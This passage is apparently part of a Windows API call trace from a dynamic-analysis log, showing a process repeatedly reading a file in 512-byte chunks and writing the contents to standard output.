[0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.871] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, 
lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.873] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType 
(hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.874] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, 
lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.875] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: 
hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.876] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.876] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 
[0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.877] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, 
lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.878] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 
